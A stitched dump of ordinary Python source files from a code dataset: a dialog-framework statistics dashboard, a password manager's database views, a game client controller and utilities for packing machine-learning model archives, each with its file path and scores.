label = f"(probs={counter/node_counter[in_node]:.2f})"
graph.edge(node2code[in_node], node2code[out_node], label=label)
st.graphviz_chart(graph)
st.subheader("Transition Trace")
df_trace = df[["history_id", "flow_label", "node"]]
df_trace.index = df_trace.history_id
df_trace = df_trace.drop(columns=["history_id"])
df_trace
node_trace = {}
for flow_label in df_trace.flow_label.unique():
node_trace[flow_label] = df_trace.loc[df_trace.flow_label == flow_label, "node"]
st.bar_chart(df_trace.loc[:, "node"])
st.subheader("Node counters")
node_counters = {}
for flow_label in flow_labels:
node_counters[flow_label] = df.loc[df.flow_label == flow_label, "node_label"].value_counts()
st.bar_chart(node_counters)
st.subheader("Transitions counters")
edge_counters = {}
for edge_type in df.edge_type.unique():
edge_counters[edge_type] = df.loc[df.edge_type == edge_type, "edge"].astype("str").value_counts()
st.bar_chart(edge_counters)
st.subheader("Transitions duration [sec]")
edge_time = df[["edge", "edge_type", "duration_time"]]
edge_time = edge_time.astype({"edge": "str"})
edge_time = edge_time.groupby(["edge", "edge_type"], as_index=False).mean()
edge_time.index = edge_time.edge
edge_duration = {}
for edge_type in df.edge_type.unique():
edge_duration[edge_type] = edge_time.loc[edge_time.edge_type == edge_type, "duration_time"]
st.bar_chart(edge_duration)
def api_run(self, port=8000):
import uvicorn
from fastapi import FastAPI
app = FastAPI()
@app.get("/api/v1/stats/transition-counts", response_model=dict[str, int])
async def get_transition_counts():
return self.transition_counts
@app.get("/api/v1/stats/transition-probs", response_model=dict[str, float])
async def get_transition_probs():
return self.transition_probs
uvicorn.run(app, host="0.0.0.0", port=port)
# st.title("Node Analytics")
# st.dataframe(self.dataframe[["flow_label", "node_label"]])
# # st.subheader('Node labels')
# st.bar_chart(self.dataframe["node_label"].value_counts())
# st.bar_chart(self.dataframe["node_label"])
# # st.dataframe(self.dataframe) | dff_node_stats/stats.py | from typing import Optional
import pathlib
import datetime
import pandas as pd
from pydantic import validate_arguments, BaseModel
from dff.core import Context, Actor
from dff.core.types import ActorStage
class Stats(BaseModel):
csv_file: pathlib.Path
start_time: Optional[datetime.datetime] = None
dfs: list = []
column_dtypes: dict = {
"context_id": "str",
"flow_label": "str",
"node_label": "str",
"history_id": "int64",
"duration_time": "float64",
}
@validate_arguments
def _update_handlers(self, actor: Actor, stage: ActorStage, handler) -> Actor:
actor.handlers[stage] = actor.handlers.get(stage, []) + [handler]
return actor
def update_actor_handlers(self, actor: Actor, auto_save: bool = True, *args, **kwargs):
self._update_handlers(actor, ActorStage.CONTEXT_INIT, self.get_start_time)
self._update_handlers(actor, ActorStage.FINISH_TURN, self.collect_stats)
if auto_save:
self._update_handlers(actor, ActorStage.FINISH_TURN, self.save)
@validate_arguments
def get_start_time(self, ctx: Context, actor: Actor, *args, **kwargs):
self.start_time = datetime.datetime.now()
if ctx.last_label is None:
self.add_df(ctx.id, -1, *actor.start_label[:2])
def add_df(self, context_id, history_id, flow_label, node_label):
self.dfs += [
pd.DataFrame(
{
"context_id": [str(context_id)],
"history_id": [history_id],
"start_time": [self.start_time],
"duration_time": [(datetime.datetime.now() - self.start_time).total_seconds()],
"flow_label": [flow_label],
"node_label": [node_label],
},
)
]
@validate_arguments
def collect_stats(self, ctx: Context, actor: Actor, *args, **kwargs):
indexes = list(ctx.labels)
current_index = indexes[-1] if indexes else -1
self.add_df(
ctx.id,
current_index,
*ctx.last_label[:2],
)
def save(self, *args, **kwargs):
saved_df = (
pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
if self.csv_file.exists()
else pd.DataFrame()
)
pd.concat([saved_df] + self.dfs).to_csv(self.csv_file, index=False)
self.dfs.clear()
@property
def dataframe(self):
return pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
@property
def transition_counts(self):
df = self.dataframe.copy()
df["node"] = df.apply(lambda row: f"{row.flow_label}:{row.node_label}", axis=1)
df = df.drop(["flow_label", "node_label"], axis=1)
df = df.sort_values(["context_id"], kind="stable")
df["next_node"] = df.node.shift()
df = df[df.history_id != 0]
transitions = df.apply(lambda row: f"{row.node}->{row.next_node}", axis=1)
return {k: int(v) for k, v in dict(transitions.value_counts()).items()}
@property
def transition_probs(self):
tc = self.transition_counts
total = sum(tc.values(), 0)
return {k: v / total for k, v in tc.items()}
def preproc_df(self, df):
for context_id in self.dataframe.context_id.unique():
ctx_index = df.context_id == context_id
df.loc[ctx_index, "node"] = df.loc[ctx_index, "flow_label"] + ":" + df.loc[ctx_index, "node_label"]
df.loc[ctx_index, "edge"] = (
df.loc[ctx_index, "node"].shift(periods=1).combine(df.loc[ctx_index, "node"], lambda *x: list(x))
)
flow_label = df.loc[ctx_index, "flow_label"]
df.loc[ctx_index, "edge_type"] = flow_label.where(flow_label.shift(periods=1) == flow_label, "MIXED")
return df
def streamlit_run(self):
import streamlit as st
import graphviz
import datetime
@st.cache(allow_output_mutation=True)
def read_data():
df = pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
df = self.preproc_df(df)
return df
df_origin = read_data()
@st.cache()
def get_datatimes():
start_time = pd.to_datetime(df_origin.start_time.min()) - datetime.timedelta(days=1)
end_time = pd.to_datetime(df_origin.start_time.max()) + datetime.timedelta(days=1)
return start_time, end_time
start_time_border, end_time_border = get_datatimes()
def get_sidebar_chnges():
start_date = pd.to_datetime(st.sidebar.date_input("Start date", start_time_border))
end_date = pd.to_datetime(st.sidebar.date_input("End date", end_time_border))
if start_date < end_date:
st.sidebar.success("Start date: `%s`\n\nEnd date:`%s`" % (start_date, end_date))
else:
st.sidebar.error("Error: End date must fall after start date.")
context_id = st.sidebar.selectbox(
"Choose context_id",
options=["all"] + df_origin.context_id.unique().tolist(),
)
return start_date, end_date, context_id
start_date, end_date, context_id = get_sidebar_chnges()
@st.cache()
def slice_df_origin(start_date, end_date, context_id):
return df_origin[
(df_origin.start_time >= start_date)
& (df_origin.start_time <= end_date)
& ((df_origin.context_id == context_id) | (context_id == "all"))
]
df = slice_df_origin(start_date, end_date, context_id)
node_counter = df.node.value_counts()
edge_counter = df.edge.value_counts()
node2code = {key: f"n{index}" for index, key in enumerate(df.node.unique())}
st.title("DialogFlow Framework Statistic Dashboard")
col1, col2 = st.columns(2)
col1.subheader("Data")
col1.dataframe(df)
col2.subheader("Timings")
col2.dataframe(df.describe().duration_time)
col2.write(f"Data shape {df.shape}")
st.subheader("Graph of Transitions")
graph = graphviz.Digraph()
graph.attr(compound="true")
flow_labels = df.flow_label.unique()
for i, flow_label in enumerate(flow_labels):
with graph.subgraph(name=f"cluster{i}") as sub_graph:
sub_graph.attr(style="filled", color="lightgrey")
sub_graph.attr(label=flow_label)
sub_graph.node_attr.update(style="filled", color="white")
for _, (history_id, node, node_label) in df.loc[
df.flow_label == flow_label, ("history_id", "node", "node_label")
].iterrows():
counter = node_counter[node]
label = f"{node_label} ({counter=})"
if history_id == -1:
sub_graph.node(node2code[node], label=label, shape="Mdiamond")
else:
sub_graph.node(node2code[node], label=label)
for (in_node, out_node), counter in edge_counter.items():
if isinstance(in_node, str):
label = f"(probs={counter/node_counter[in_node]:.2f})"
graph.edge(node2code[in_node], node2code[out_node], label=label)
st.graphviz_chart(graph)
st.subheader("Transition Trace")
df_trace = df[["history_id", "flow_label", "node"]]
df_trace.index = df_trace.history_id
df_trace = df_trace.drop(columns=["history_id"])
df_trace
node_trace = {}
for flow_label in df_trace.flow_label.unique():
node_trace[flow_label] = df_trace.loc[df_trace.flow_label == flow_label, "node"]
st.bar_chart(df_trace.loc[:, "node"])
st.subheader("Node counters")
node_counters = {}
for flow_label in flow_labels:
node_counters[flow_label] = df.loc[df.flow_label == flow_label, "node_label"].value_counts()
st.bar_chart(node_counters)
st.subheader("Transitions counters")
edge_counters = {}
for edge_type in df.edge_type.unique():
edge_counters[edge_type] = df.loc[df.edge_type == edge_type, "edge"].astype("str").value_counts()
st.bar_chart(edge_counters)
st.subheader("Transitions duration [sec]")
edge_time = df[["edge", "edge_type", "duration_time"]]
edge_time = edge_time.astype({"edge": "str"})
edge_time = edge_time.groupby(["edge", "edge_type"], as_index=False).mean()
edge_time.index = edge_time.edge
edge_duration = {}
for edge_type in df.edge_type.unique():
edge_duration[edge_type] = edge_time.loc[edge_time.edge_type == edge_type, "duration_time"]
st.bar_chart(edge_duration)
def api_run(self, port=8000):
import uvicorn
from fastapi import FastAPI
app = FastAPI()
@app.get("/api/v1/stats/transition-counts", response_model=dict[str, int])
async def get_transition_counts():
return self.transition_counts
@app.get("/api/v1/stats/transition-probs", response_model=dict[str, float])
async def get_transition_probs():
return self.transition_probs
uvicorn.run(app, host="0.0.0.0", port=port)
# st.title("Node Analytics")
# st.dataframe(self.dataframe[["flow_label", "node_label"]])
# # st.subheader('Node labels')
# st.bar_chart(self.dataframe["node_label"].value_counts())
# st.bar_chart(self.dataframe["node_label"])
# # st.dataframe(self.dataframe) | 0.850841 | 0.185228 |
from dinopass.encryption import encrypt, decrypt
from dinopass.models import MasterPassword, Password
class PasswordViewMixin:
model = None
def __init__(self, db_session):
if not self.model:
raise NotImplementedError('Please specify a model!')
self._db_session = db_session
def get(self):
return self.model.get(self._db_session)
def purge(self):
self.model.purge(self._db_session)
self._db_session.commit()
def has_records(self):
return self.model.has_records(self._db_session)
class MasterPasswordView(PasswordViewMixin):
model = MasterPassword
@property
def salt(self):
return self.model.get(self._db_session).salt
@property
def hash_key(self):
return self.model.get(self._db_session).hash_key
def create(self, **kwargs):
record = self.model.create(**kwargs)
self._db_session.add(record)
self._db_session.commit()
def is_valid(self, hash_key):
return hash_key == self.hash_key
class PasswordView(PasswordViewMixin):
model = Password
@property
def name(self):
return self.model.get(self._db_session).name
@property
def value(self):
return self.model.get(self._db_session).value
def create(self, key, name, value):
encrypted_value = encrypt(key, value)
record = self.model.create(name=name, value=encrypted_value)
self._db_session.add(record)
self._db_session.commit()
def get_all(self, key):
records = []
for record in self.model.get_all(self._db_session):
record.value = decrypt(key, record.value)
records.append(record.to_dict())
return records
def get_by_name(self, key, name):
record = self.model.get_by_name(name, self._db_session)
if record:
record.value = decrypt(key, record.value)
return [record.to_dict()]
return []
def update(self, key, field, value, field_to_update, new_value):
if field_to_update == 'value':
new_value = encrypt(key, new_value)
self.model.update_by_field(
field=field,
value=value,
field_to_update=field_to_update,
new_value=new_value,
session=self._db_session
)
self._db_session.commit()
print(f'Updated record with name = {field_to_update}')
def delete(self, name):
self.model.delete_by_name(name=name, session=self._db_session)
self._db_session.commit()
print(f'Deleted record with name = {name}') | dinopass/views.py | from dinopass.encryption import encrypt, decrypt
from dinopass.models import MasterPassword, Password
class PasswordViewMixin:
model = None
def __init__(self, db_session):
if not self.model:
raise NotImplementedError('Please specify a model!')
self._db_session = db_session
def get(self):
return self.model.get(self._db_session)
def purge(self):
self.model.purge(self._db_session)
self._db_session.commit()
def has_records(self):
return self.model.has_records(self._db_session)
class MasterPasswordView(PasswordViewMixin):
model = MasterPassword
@property
def salt(self):
return self.model.get(self._db_session).salt
@property
def hash_key(self):
return self.model.get(self._db_session).hash_key
def create(self, **kwargs):
record = self.model.create(**kwargs)
self._db_session.add(record)
self._db_session.commit()
def is_valid(self, hash_key):
return hash_key == self.hash_key
class PasswordView(PasswordViewMixin):
model = Password
@property
def name(self):
return self.model.get(self._db_session).name
@property
def value(self):
return self.model.get(self._db_session).value
def create(self, key, name, value):
encrypted_value = encrypt(key, value)
record = self.model.create(name=name, value=encrypted_value)
self._db_session.add(record)
self._db_session.commit()
def get_all(self, key):
records = []
for record in self.model.get_all(self._db_session):
record.value = decrypt(key, record.value)
records.append(record.to_dict())
return records
def get_by_name(self, key, name):
record = self.model.get_by_name(name, self._db_session)
if record:
record.value = decrypt(key, record.value)
return [record.to_dict()]
return []
def update(self, key, field, value, field_to_update, new_value):
if field_to_update == 'value':
new_value = encrypt(key, new_value)
self.model.update_by_field(
field=field,
value=value,
field_to_update=field_to_update,
new_value=new_value,
session=self._db_session
)
self._db_session.commit()
print(f'Updated record with name = {field_to_update}')
def delete(self, name):
self.model.delete_by_name(name=name, session=self._db_session)
self._db_session.commit()
print(f'Deleted record with name = {name}') | 0.789153 | 0.153676 |
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Union
from game import Position
from game.client.controller.menu import Menu
from game.client.model.action import Action, ActionType, MoveAction, InventoryAction, ItemAction
from game.client.model.model import Model
from game.client.view.user_command import UserCommand
from game.client.view.view import View
class Controller:
FRAMES_PER_SECOND = 20
GAME_CONFIG_PATH = Path('resources', 'config', 'game_config.json')
ENTITIES_CONFIG_PATH = Path('resources', 'config', 'entities.json')
LOG_DIR_PATH = Path('resources', 'logs')
def __init__(self, *args, **kwargs):
with self.GAME_CONFIG_PATH.open('r') as src:
self.game_config = json.load(src)
with self.ENTITIES_CONFIG_PATH.open('r') as src:
self.entities_desc = json.load(src)
self.model = Model()
self.menu = None
self.view = View(self, self.model, self.entities_desc)
self.logger = logging.getLogger(self.__class__.__name__)
self.logger.setLevel(logging.DEBUG)
self._create_log_handler()
def _create_log_handler(self):
if not Controller.LOG_DIR_PATH.exists():
Controller.LOG_DIR_PATH.mkdir()
current_date = datetime.now().strftime('%Y.%m.%d %H.%M.%S')
log_name = 'client {}.txt'.format(current_date)
log_file = Controller.LOG_DIR_PATH / log_name
file_handler = logging.FileHandler(str(log_file))
file_handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%m/%d/%Y %I:%M:%S %p')
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
"""
Starts the game on the client side.
Processes all user actions and interacts with server.
"""
def start_game(self):
self.view.create()
error = None
self.logger.info('Game started')
while True:
self.logger.info('On new game stage')
self.view.initialize()
self.menu = Menu(self.view, error)
error = None
try:
self.logger.info('On make_choice stage')
network = self.menu.make_choice()
if network is None:
self.logger.info('No network received, possible exit button was clicked')
break
self.logger.info(f'Network was successfully created, singleplayer mode: {network.singleplayer}')
if not network.singleplayer:
self.view.set_game_id(network.game_id)
else:
self.view.set_game_id(None)
self.logger.info('Starting game loop')
while True:
self.logger.info('Receiving game state...')
state = network.get_state()
self.logger.info('Success')
self.model.update(state)
self.view.refresh_game()
if self.model.hero.stats.health == 0:
quit = False
while self.view.has_user_commands():
cmd = self.view.get_user_command()
if cmd == UserCommand.QUIT:
quit = True
if quit:
break
else:
self.view.clear_user_command_queue()
if state.my_turn:
action = self._get_user_action()
if action is None:
continue
network.send_action(action)
if action.type == ActionType.QUIT_ACTION:
break
self.view.delay(1.0 / self.FRAMES_PER_SECOND)
self.logger.info('Game successfully finished')
except Exception as e:
error = 'Disconnected from server'
self.logger.error('Disconnected from server')
self.logger.exception(e)
finally:
self.menu.destroy()
self.view.destroy()
def _get_user_action(self) -> Union[Action, None]:
while True:
cmd = self.view.get_user_command()
if cmd is UserCommand.UNKNOWN:
return None
if cmd in [UserCommand.UP, UserCommand.DOWN, UserCommand.LEFT, UserCommand.RIGHT, UserCommand.SKIP]:
action = self._process_move(cmd)
if action is not None:
return action
continue
if cmd == UserCommand.INVENTORY:
action = self._process_inventory()
if action is not None:
return action
continue
if cmd == UserCommand.QUIT:
action = Action(type=ActionType.QUIT_ACTION, desc=None)
return action
# TODO add processing of other available commands
def _process_move(self, cmd: UserCommand) -> Union[Action, None]:
dr, dc = {UserCommand.UP: (-1, 0),
UserCommand.DOWN: (+1, 0),
UserCommand.LEFT: ( 0, -1),
UserCommand.RIGHT: ( 0, +1),
UserCommand.SKIP: ( 0, 0)}[cmd]
hero_position = self.model.hero.position
new_position = Position.as_position(hero_position.row + dr, hero_position.col + dc)
if self.model.labyrinth.is_wall(new_position):
return None
return Action(type=ActionType.MOVE_ACTION,
desc=MoveAction(row=new_position.row, column=new_position.col))
def _process_inventory(self) -> Union[Action, None]:
inventory = self.model.inventory
inventory.open()
self.view.refresh_game()
action = None
while True:
cmd = self.view.get_user_command()
if cmd == UserCommand.INVENTORY:
break
if cmd == UserCommand.DOWN:
inventory.select_next_item()
self.view.refresh_game()
continue
if cmd == UserCommand.UP:
inventory.select_previous_item()
self.view.refresh_game()
continue
if inventory.no_item_selected():
continue
if cmd == UserCommand.USE:
item_id = inventory.get_selected_item_position()
action = Action(type=ActionType.INVENTORY_ACTION,
desc=InventoryAction(item_id=item_id, action=ItemAction.USE))
break
if cmd == UserCommand.DROP:
item_id = inventory.get_selected_item_position()
action = Action(type=ActionType.INVENTORY_ACTION,
desc=InventoryAction(item_id=item_id, action=ItemAction.DROP))
break
inventory.close()
self.view.refresh_game()
return action | game/client/controller/controller.py | import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Union
from game import Position
from game.client.controller.menu import Menu
from game.client.model.action import Action, ActionType, MoveAction, InventoryAction, ItemAction
from game.client.model.model import Model
from game.client.view.user_command import UserCommand
from game.client.view.view import View
class Controller:
FRAMES_PER_SECOND = 20
GAME_CONFIG_PATH = Path('resources', 'config', 'game_config.json')
ENTITIES_CONFIG_PATH = Path('resources', 'config', 'entities.json')
LOG_DIR_PATH = Path('resources', 'logs')
def __init__(self, *args, **kwargs):
with self.GAME_CONFIG_PATH.open('r') as src:
self.game_config = json.load(src)
with self.ENTITIES_CONFIG_PATH.open('r') as src:
self.entities_desc = json.load(src)
self.model = Model()
self.menu = None
self.view = View(self, self.model, self.entities_desc)
self.logger = logging.getLogger(self.__class__.__name__)
self.logger.setLevel(logging.DEBUG)
self._create_log_handler()
def _create_log_handler(self):
if not Controller.LOG_DIR_PATH.exists():
Controller.LOG_DIR_PATH.mkdir()
current_date = datetime.now().strftime('%Y.%m.%d %H.%M.%S')
log_name = 'client {}.txt'.format(current_date)
log_file = Controller.LOG_DIR_PATH / log_name
file_handler = logging.FileHandler(str(log_file))
file_handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%m/%d/%Y %I:%M:%S %p')
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
"""
Starts the game on the client side.
Processes all user actions and interacts with server.
"""
def start_game(self):
self.view.create()
error = None
self.logger.info('Game started')
while True:
self.logger.info('On new game stage')
self.view.initialize()
self.menu = Menu(self.view, error)
error = None
try:
self.logger.info('On make_choice stage')
network = self.menu.make_choice()
if network is None:
self.logger.info('No network received, possible exit button was clicked')
break
self.logger.info(f'Network was successfully created, singleplayer mode: {network.singleplayer}')
if not network.singleplayer:
self.view.set_game_id(network.game_id)
else:
self.view.set_game_id(None)
self.logger.info('Starting game loop')
while True:
self.logger.info('Receiving game state...')
state = network.get_state()
self.logger.info('Success')
self.model.update(state)
self.view.refresh_game()
if self.model.hero.stats.health == 0:
quit = False
while self.view.has_user_commands():
cmd = self.view.get_user_command()
if cmd == UserCommand.QUIT:
quit = True
if quit:
break
else:
self.view.clear_user_command_queue()
if state.my_turn:
action = self._get_user_action()
if action is None:
continue
network.send_action(action)
if action.type == ActionType.QUIT_ACTION:
break
self.view.delay(1.0 / self.FRAMES_PER_SECOND)
self.logger.info('Game successfully finished')
except Exception as e:
error = 'Disconnected from server'
self.logger.error('Disconnected from server')
self.logger.exception(e)
finally:
self.menu.destroy()
self.view.destroy()
def _get_user_action(self) -> Union[Action, None]:
while True:
cmd = self.view.get_user_command()
if cmd is UserCommand.UNKNOWN:
return None
if cmd in [UserCommand.UP, UserCommand.DOWN, UserCommand.LEFT, UserCommand.RIGHT, UserCommand.SKIP]:
action = self._process_move(cmd)
if action is not None:
return action
continue
if cmd == UserCommand.INVENTORY:
action = self._process_inventory()
if action is not None:
return action
continue
if cmd == UserCommand.QUIT:
action = Action(type=ActionType.QUIT_ACTION, desc=None)
return action
# TODO add processing of other available commands
def _process_move(self, cmd: UserCommand) -> Union[Action, None]:
dr, dc = {UserCommand.UP: (-1, 0),
UserCommand.DOWN: (+1, 0),
UserCommand.LEFT: ( 0, -1),
UserCommand.RIGHT: ( 0, +1),
UserCommand.SKIP: ( 0, 0)}[cmd]
hero_position = self.model.hero.position
new_position = Position.as_position(hero_position.row + dr, hero_position.col + dc)
if self.model.labyrinth.is_wall(new_position):
return None
return Action(type=ActionType.MOVE_ACTION,
desc=MoveAction(row=new_position.row, column=new_position.col))
def _process_inventory(self) -> Union[Action, None]:
inventory = self.model.inventory
inventory.open()
self.view.refresh_game()
action = None
while True:
cmd = self.view.get_user_command()
if cmd == UserCommand.INVENTORY:
break
if cmd == UserCommand.DOWN:
inventory.select_next_item()
self.view.refresh_game()
continue
if cmd == UserCommand.UP:
inventory.select_previous_item()
self.view.refresh_game()
continue
if inventory.no_item_selected():
continue
if cmd == UserCommand.USE:
item_id = inventory.get_selected_item_position()
action = Action(type=ActionType.INVENTORY_ACTION,
desc=InventoryAction(item_id=item_id, action=ItemAction.USE))
break
if cmd == UserCommand.DROP:
item_id = inventory.get_selected_item_position()
action = Action(type=ActionType.INVENTORY_ACTION,
desc=InventoryAction(item_id=item_id, action=ItemAction.DROP))
break
inventory.close()
self.view.refresh_game()
return action | 0.412057 | 0.060947 |
import json
import hashlib
import os
import tarfile
import rocketbase.exceptions
# --- CONSTANTS ---
# List of all the required information
LIST_REQUIRED_INFO = [
'username',
'modelName',
'family',
'trainingDataset',
'isTrainable',
'rocketRepoUrl',
'originRepoUrl',
'description',
'blueprint'
]
# List of all the valid Rocket families
LIST_ROCKET_FAMILIES = [
'image_object_detection',
'image_human_pose_estimation',
'image_classification',
'image_superresolution',
'image_style_transfer',
'image_segmentation',
'image_instance_segmentation'
]
# --- TAR ARCHIVE ---
def unpack_tar_to_rocket(tar_path: str, rocket_folder_name: str, folder_path: str, remove_after_unpack: bool = True):
"""Unpack a tar archive to a Rocket folder
Unpack a tar archive in a specific folder, rename it and then remove the tar file (or not if the user doesn't want to)
Args:
tar_path (str): path to the tar file containing the Rocket which should be unpacked
rocket_folder_name (str): folder name for the Rocket (to change the one from the tar file)
folder_path (str): folder where the Rocket should be moved once unpacked.
remove_after_unpack (bool, optional): choose to remove the tar file once the Rocket is unpacked. Defaults to True.
Returns:
rocket_folder_path(str): path to the Rocket folder once unpacked.
"""
with tarfile.open(tar_path, 'r') as t:
tar_folder_name = os.path.commonprefix(t.getnames())
t.extractall(folder_path) # unpack in the wrong folder
# Should rename the folder once it is unpacked
rocket_folder_path = os.path.join(folder_path, rocket_folder_name)
os.rename(os.path.join(folder_path, tar_folder_name), rocket_folder_path)
if remove_after_unpack:
os.remove(tar_path)
return rocket_folder_path
def pack_rocket_to_tar(rocket_path: str, rocket_folder_name: str, blueprint: list):
"""Packs a Rocket into a tar archive
Packs a Rocket's contents as described in the blueprint list of files into a tar archive
Args:
rocket_path (str): path to the Rocket folder containing all the files which need to be added in the Rocket.
rocket_folder_name (str): slug of the Rocket without the hash and with underscore (e.g. username_modelName).
blueprint (List[str]): list of all the file in the Rocket's folder that should be included in the tar file.
Notes:
If the filename in the blueprint is a folder, all the files in this folder will be added to the tar file.
Returns:
tar_path (str): path the newly created tar file containing the Rocket.
"""
# Path to the tar file
tar_path = rocket_path + '_ready_for_launch.tar'
with tarfile.open(tar_path, "w") as tar_handle:
for filename in blueprint: # Only add the files in the blueprint
# Add the file and rename it to not put the full path in the tar file
tar_handle.add(
name = os.path.join(rocket_path, filename),
arcname= os.path.join(rocket_folder_name, filename),
)
return tar_path
def get_file_sha1_hash(file_path: str):
"""Compute SHA-1 Hash of a file
Args:
file_path (str): Path to the file we want to compute the hash from.
Returns:
hash (str): SHA-1 hash of the referenced file.
Raises:
RocketHashNotValid: If the computed SHA-1 has a different length from the constant LENGTH_SHA1_HASH.
"""
LENGTH_SHA1_HASH = 40
with open(file_path, 'rb') as f:
buf = f.read()
file_hash = hashlib.sha1(buf).hexdigest()
if len(file_hash) != LENGTH_SHA1_HASH:
raise rocketbase.exceptions.RocketHashNotValid(
'SHA-1 hash computation failed on file: {}'.format(file_path))
return file_hash
# --- ROCKET INFO + CONVERSION ---
def convert_slug_to_dict(rocket_slug: str, parsing_char: str = '/', version_type: str = 'label') -> dict:
"""Convert a Rocket slug to a dictionary.
Convert a Rocket slug of the shape <username>/<modelName/(<hash> or <label>) (e.g. igor/retinanet) to a dictonary with the following structure: {'username': <username>, 'modelName': <name>, '<version_type>': <hash> or <label>}.
All the arguments in the outputted dictionary are String. The <hash> or <label> in the Rocket slug is optional and will not be added to the output dictionary if it is not in the slug.
Args:
rocket_slug (str): The Rocket slug in the shape <username>/<modelName>/(<hash> or <label>). The <hash> and <label> are optional. The <hash> should be complete.
parsing_char (str): The character used to parse the information in the slug.
version_type (str): The key to define the version (either label or hash)
Returns:
rocket_info (dict): A dict containing the information provided in rocket_slug.
Raises:
RocketNotEnoughInfo: If the <username> and/or the <modelName> of the Rocket are missing in the Rocket slug.
"""
# Cast the rocket_slug to a String with lower case
rocket_slug = str(rocket_slug).lower()
# Check if the rocket_slug is not empty
if not rocket_slug:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'Please specify the slug of the Rocket you want to get (e.g. <username>/<modelName>).')
# Parse the Rocket url
rocket_parsed = rocket_slug.split(parsing_char)
if not rocket_parsed:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'\'{}\' is not a correct slug for a Rocket. Please provide more information about the Rocket you want to get (<username>/<modelName>).'.format(rocket_slug))
rocket_username = str(rocket_parsed[0])
rocket_modelName = str(rocket_parsed[1])
rocket_info = {'username': rocket_username, 'modelName': rocket_modelName}
# Check if a specific hash or label has been precised
if len(rocket_parsed) > 2:
rocket_label = parsing_char.join(rocket_parsed[2:])
rocket_info[version_type] = rocket_label
return rocket_info
def get_list_rocket_info_from_folder(folder_path: str) -> list:
"""Get the list of rocket_info from folders name inside of a folder.
Args:
folder_path (str): Path to the folder containing the folders of the Rockets.
Returns:
list_rocket_info (list): List of rocket_info of all the folders of the Rockets in folder_path.
"""
list_folders = [f for f in os.listdir(
folder_path) if not f.startswith('.') and f.count('_') >= 2]
list_rocket_info = [convert_slug_to_dict(
f, '_', 'hash') for f in list_folders]
return list_rocket_info
def convert_dict_to_foldername(rocket_info: dict, separation_char: str = '_', include_hash = True) -> str:
"""Convert a dict containing the information about a Rocket to a folder name.
Args:
rocket_info (dict): Dictionary containing the information about a Rocket.
separation_char (str): Character used to separate the information in the name of the folder.
include_hash (bool): Defautl True. Boolean to include the hash of the Rocket in the folder name.
Returns:
rocket_folder_name (str): Name of the folder containing the Rocket.
Raises:
RocketNotEnoughInfo: If there are not enough information to create the folder name
"""
# List of the information required to create the folder name
list_required_info = [
'username',
'modelName'
]
# If the hash needs to be included, add the hash to the required information
if include_hash:
list_required_info.append('hash')
missing_info = set(list_required_info) - rocket_info.keys()
if missing_info:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'Missing the following information to create the Rocket\'s folder name: ' + ', '.join(missing_info))
info_to_use = [rocket_info['username'], rocket_info['modelName']]
if include_hash:
info_to_use.append(rocket_info['hash'])
rocket_folder_name = str(separation_char).join(info_to_use)
return rocket_folder_name
def import_rocket_info_from_rocket_folder(rocket_folder_path: str, metadata_json_filename: str = 'info.json'):
""" Import the metadata information about a Rocket from its folder.
Import the information in the json file named with <metadata_json_filename> and check the information to see if they corresponds to LIST_REQUIRED_INFO and LIST_ROCKET_FAMILIES.
Args:
rocket_folder_path (str): path to the Rocket's folder
metadata_json_filename (str): name of the .json file containing the metadata information about the Rocket.
Returns:
rocket_info (dict): dictionary containing all the Rocket metadata information.
Raises:
RocketNotEnoughInfo: If there is not enough information in the json file to launch the Rocket.
RocketInfoFormat: If some information about the Rocket are not formatted the right way.
"""
# Path to the file containing the information about the Rocket
metadata_json_path = os.path.join(
rocket_folder_path, metadata_json_filename)
# Load the information from the .json file
with open(metadata_json_path) as info_json:
rocket_info = json.load(info_json)
# -- INFO CHECK --
# Check if some fields are missing
missing_info = set(LIST_REQUIRED_INFO) - rocket_info.keys()
if missing_info:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'Missing some information about the Rocket in the file: ' + metadata_json_path + '. Missing the following information: ' + ', '.join(missing_info))
# Check if some info are empty
list_empty_info = [key for key, item in rocket_info.items() if not isinstance(
item, bool) and not item and key in LIST_REQUIRED_INFO]
if list_empty_info:
raise rocketbase.exceptions.RocketNotEnoughInfo('Missing some information about the Rocket in the file: ' +
metadata_json_path + '. Please provide more information for the following field(s): ' + ', '.join(list_empty_info))
# Check if the username contains a '_'
if '_' in rocket_info['username']:
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\', the username \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['username']))
# Check if the modelName contains a '_'
if '_' in rocket_info['modelName']:
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\', the modelName \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['modelName']))
# Check if the rocket family is in the list of valid families
if not rocket_info['family'] in LIST_ROCKET_FAMILIES:
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\', the family \'{}\' is not valid. Please refer to the documentation for a list of valid family names.'.format(metadata_json_path, rocket_info['family']))
# Check if isTrainable is a boolean
if not isinstance(rocket_info['isTrainable'], bool):
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\',the field isTrainable needs to be a Boolean'.format(
metadata_json_path))
# Check if blueprint is a list
if not isinstance(rocket_info['blueprint'], list):
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\',the field blueprint needs to be a list of filenames.'.format(
metadata_json_path))
return rocket_info | rocketbase/utils.py | import json
import hashlib
import os
import tarfile
import rocketbase.exceptions
# --- CONSTANTS ---
# List of all the required information
LIST_REQUIRED_INFO = [
'username',
'modelName',
'family',
'trainingDataset',
'isTrainable',
'rocketRepoUrl',
'originRepoUrl',
'description',
'blueprint'
]
# List of all the valid Rocket families
